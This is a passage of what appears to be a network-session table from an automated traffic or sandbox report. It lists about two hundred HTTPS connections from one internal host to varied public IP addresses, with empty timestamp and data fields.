                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9572192.168.2.1442050135.36.161.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9573192.168.2.1433102108.232.0.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9574192.168.2.143550836.55.164.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9575192.168.2.144281674.196.89.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9576192.168.2.1438466210.244.30.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9577192.168.2.143321039.250.52.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9578192.168.2.14440409.28.27.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9579192.168.2.1441154161.18.23.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9580192.168.2.1435030103.227.82.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9581192.168.2.1444818172.239.47.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9582192.168.2.1457718135.154.172.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9583192.168.2.1441446131.50.72.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9584192.168.2.143662036.134.182.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9585192.168.2.1434008206.45.115.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9586192.168.2.1460076178.155.138.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9587192.168.2.1458736120.76.145.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9588192.168.2.1436044103.193.149.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9589192.168.2.1458980190.201.228.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9590192.168.2.1450112163.242.208.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9591192.168.2.1452132192.96.161.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9592192.168.2.1454358189.3.151.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9593192.168.2.1445886139.220.226.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9594192.168.2.1455352104.189.103.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9595192.168.2.145798868.173.184.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9596192.168.2.1452960184.78.95.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9597192.168.2.143994420.165.213.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9598192.168.2.1460250120.216.103.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9599192.168.2.143894236.230.29.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9600192.168.2.1449422186.62.52.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9601192.168.2.1442286141.86.148.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9602192.168.2.1439164162.75.233.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9603192.168.2.145836618.76.163.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9604192.168.2.1453014206.136.138.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9605192.168.2.144103271.232.139.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9606192.168.2.1446264200.164.162.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9607192.168.2.143379699.210.117.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9608192.168.2.1435774213.26.162.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9609192.168.2.1454532135.100.155.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9610192.168.2.143994037.224.138.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9611192.168.2.1441772174.205.8.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9612192.168.2.144004665.37.153.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9613192.168.2.1448358182.61.100.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9614192.168.2.1454312209.235.137.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9615192.168.2.143991472.8.53.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9616192.168.2.1455160190.217.224.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9617192.168.2.1435000181.67.153.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9618192.168.2.143712459.37.27.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9619192.168.2.1455426123.234.119.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9620192.168.2.144010897.41.184.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9621192.168.2.1457830116.69.165.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9622192.168.2.1452904191.243.110.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9623192.168.2.1460076145.68.131.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9624192.168.2.1433040157.206.243.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9625192.168.2.1455034216.137.42.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9626192.168.2.145300023.173.82.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9627192.168.2.1433102106.247.14.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9628192.168.2.1448854119.213.8.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9629192.168.2.143382075.190.59.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9630192.168.2.1455308186.200.61.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9631192.168.2.1453870172.246.81.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9632192.168.2.143331461.207.70.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9633192.168.2.1449552114.34.142.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9634192.168.2.145618031.226.170.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9635192.168.2.145830647.110.226.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9636192.168.2.1460000103.183.8.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9637192.168.2.1439822109.200.123.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9638192.168.2.144981836.33.213.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9639192.168.2.144834447.216.145.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9640192.168.2.1433346210.110.71.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9641192.168.2.1455338200.54.139.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9642192.168.2.143372493.175.116.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9643192.168.2.1437442173.69.75.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9644192.168.2.1441770137.70.192.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9645192.168.2.1451202157.85.121.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9646192.168.2.144616627.200.2.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9647192.168.2.143365251.237.41.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9648192.168.2.143504813.221.181.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9649192.168.2.1442822205.98.28.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9650192.168.2.1445566206.55.156.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9651192.168.2.1445860106.228.94.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9652192.168.2.144130260.29.142.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9653192.168.2.1457488102.182.70.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9654192.168.2.1456528160.68.88.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9655192.168.2.1440818192.76.121.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9656192.168.2.145629248.173.140.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9657192.168.2.14602908.187.109.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9658192.168.2.143421825.75.133.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9659192.168.2.1459842223.24.54.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9660192.168.2.1446684208.102.111.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9661192.168.2.1444432196.113.231.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9662192.168.2.143622834.165.17.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9663192.168.2.144927859.62.252.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9664192.168.2.1445918180.92.142.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9665192.168.2.144356293.123.28.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9666192.168.2.1456580120.78.171.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9667192.168.2.143975250.107.126.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9668192.168.2.143857635.145.50.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9669192.168.2.1434996221.241.13.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9670192.168.2.1452520221.193.160.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9671192.168.2.1435212187.241.234.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9672192.168.2.1452562116.111.152.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9673192.168.2.143368297.199.38.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9674192.168.2.1434802104.134.202.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9675192.168.2.1440436175.184.187.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9676192.168.2.1434128147.1.171.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9677192.168.2.1443998220.206.28.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9678192.168.2.145583853.204.193.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9679192.168.2.1432994174.158.118.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9680192.168.2.1455448158.27.133.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9681192.168.2.144972242.164.53.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9682192.168.2.1449196133.151.42.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9683192.168.2.145606037.120.34.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9684192.168.2.1441634218.130.41.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9685192.168.2.1446774183.55.197.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9686192.168.2.1436556162.18.61.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9687192.168.2.1439092199.41.62.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9688192.168.2.1435902185.4.138.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9689192.168.2.1451594180.156.37.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9690192.168.2.143311259.62.150.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9691192.168.2.1457054180.72.178.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9692192.168.2.1445450209.205.106.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9693192.168.2.1441288217.120.157.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9694192.168.2.145154261.160.76.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9695192.168.2.1449260206.46.218.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9696192.168.2.1446300186.185.38.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9697192.168.2.1449156181.218.42.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9698192.168.2.14442205.187.48.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9699192.168.2.1458862124.221.200.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9700192.168.2.1457736119.50.187.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9701192.168.2.1443788199.87.200.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9702192.168.2.1443720187.117.235.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9703192.168.2.143478662.247.181.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9704192.168.2.1434308131.225.139.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9705192.168.2.1458664107.2.72.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9706192.168.2.1432986201.123.56.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9707192.168.2.1444756102.38.225.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9708192.168.2.1449108183.55.23.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9709192.168.2.145651020.223.54.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9710192.168.2.1435438199.77.101.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9711192.168.2.1441814171.225.42.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9712192.168.2.1458326114.215.95.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9713192.168.2.144693692.100.131.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9714192.168.2.1453012134.29.107.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9715192.168.2.1437148125.27.83.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9716192.168.2.1455734107.124.10.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9717192.168.2.145360035.70.230.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9718192.168.2.1449110220.167.223.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9719192.168.2.146027259.103.8.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9720192.168.2.143567089.229.204.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9721192.168.2.1450950164.71.151.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9722192.168.2.143488875.210.253.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9723192.168.2.1441128152.102.50.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9724192.168.2.1440366187.207.227.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9725192.168.2.1442452139.148.96.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9726192.168.2.1442590205.174.54.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9727192.168.2.14386708.118.205.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9728192.168.2.1445710165.234.170.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9729192.168.2.1446756173.89.72.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9730192.168.2.1453274165.131.162.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9731192.168.2.1450270106.233.196.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9732192.168.2.1457536124.198.82.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9733192.168.2.144175483.25.5.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9734192.168.2.14491365.104.204.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9735192.168.2.144293691.108.57.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9736192.168.2.145111659.221.76.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9737192.168.2.1459916132.32.43.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9738192.168.2.1444484194.97.144.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9739192.168.2.144263642.68.213.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9740192.168.2.1447728124.120.249.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9741192.168.2.1449610123.177.75.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9742192.168.2.1449092150.133.41.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9743192.168.2.1432980150.119.35.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9744192.168.2.1453640133.86.45.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9745192.168.2.145201423.112.82.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9746192.168.2.145767893.212.142.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9747192.168.2.1444660169.89.134.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9748192.168.2.143923227.223.254.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9749192.168.2.144408889.146.49.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9750192.168.2.1447168106.155.30.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9751192.168.2.1460942187.166.77.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9752192.168.2.1455110159.149.241.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9753192.168.2.143978252.149.83.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9754192.168.2.1448608148.205.241.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9755192.168.2.143418283.190.46.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9756192.168.2.1437730195.117.198.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9757192.168.2.1435354155.78.67.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9758192.168.2.145920090.72.170.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9759192.168.2.1458066172.154.69.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9760192.168.2.144224472.97.74.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9761192.168.2.145597472.168.170.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9762192.168.2.144256051.146.202.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9763192.168.2.143699032.132.106.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9764192.168.2.1460490128.104.192.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9765192.168.2.1439288133.235.219.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9766192.168.2.144632052.250.146.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9767192.168.2.145580096.48.46.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9768192.168.2.1444988129.218.237.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9769192.168.2.1436914195.74.254.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9770192.168.2.144849020.7.116.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9771192.168.2.1443244128.2.167.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9772192.168.2.1458358143.189.210.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9773192.168.2.1445208193.136.211.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9774192.168.2.144170689.118.102.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9775192.168.2.1439666107.62.30.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9776192.168.2.1453396108.82.2.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9777192.168.2.1460624152.103.150.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9778192.168.2.1447586143.19.153.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9779192.168.2.145026838.126.187.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9780192.168.2.1439006131.10.80.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9781192.168.2.1445558158.9.143.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9782192.168.2.145228666.70.2.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9783192.168.2.1439412134.41.194.28443
                                                        TimestampBytes transferredDirectionData


